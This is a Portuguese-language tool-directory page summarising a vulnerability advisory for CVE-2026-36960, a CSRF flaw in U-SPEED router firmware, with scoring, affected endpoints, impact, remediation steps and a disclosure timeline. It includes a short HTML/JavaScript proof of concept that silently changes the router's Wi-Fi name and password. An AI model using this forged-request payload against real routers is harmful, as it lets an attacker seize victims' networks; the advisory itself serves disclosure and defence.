Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/kirubel-cve/cve-2026-36960
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubkirubel-cve/cve-2026-36960

CVE-2026-36960

Prova de conceito de exploit para CVE-2026-36960, uma vulnerabilidade de CSRF no firmware do roteador U-SPEED que permite alterações de configuração não autorizadas por meio de requisições forjadas.

Ver Repositório
4há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-36960: Cross-Site Request Forgery (CSRF) na Interface de Gerenciamento Web

ID CVE: CVE-2026-36960 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: U-SPEED Produto: Roteador U-SPEED Versão do Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)


Descrição

O firmware V1.0.0 do Roteador U-SPEED não implementa mecanismos de proteção contra CSRF, como tokens anti-CSRF ou validação rigorosa de cabeçalhos Origin/Referer para endpoints administrativos da API. Um atacante pode criar uma página da web maliciosa que envia requisições HTTP forjadas para endpoints de configuração. Se um administrador autenticado visitar a página da web maliciosa, o roteador processa a requisição como uma ação administrativa legítima.


Pontuação CVSS

Pontuação CVSS v3.1: 8.8 (Alta) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MétricaValor
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNecessária
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto

Endpoints Afetados

EndpointFunção
/api/setWlanConfiguração da rede sem fio
/api/telnetConfiguração do serviço Telnet
Outros endpoints de configuraçãoVárias funções administrativas

Prova de Conceito

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Comportamento Esperado: A requisição deve ser rejeitada devido à ausência de token CSRF. Comportamento Real: O roteador aceita e processa a requisição forjada.


Impacto

  • Modificação não autorizada da configuração do roteador
  • Assunção do controle da rede WiFi
  • Manipulação do serviço Telnet
  • Negação de serviço para usuários legítimos

Remediação

  • Implementar tokens anti-CSRF em todos os endpoints que alteram estado
  • Aplicar validação rigorosa dos cabeçalhos Origin e Referer
  • Usar o atributo de cookie SameSite=Strict

Cronograma de Divulgação

DataEvento
2026-04-29Vulnerabilidade descoberta
2026-04-29Reportada à MITRE
2026-04-29CVE-2026-36960 atribuído
2026-04-29Divulgação pública

Referências

  • MITRE CVE-2026-36960
  • CWE-352
  • Site do Fornecedor
Baixar ferramenta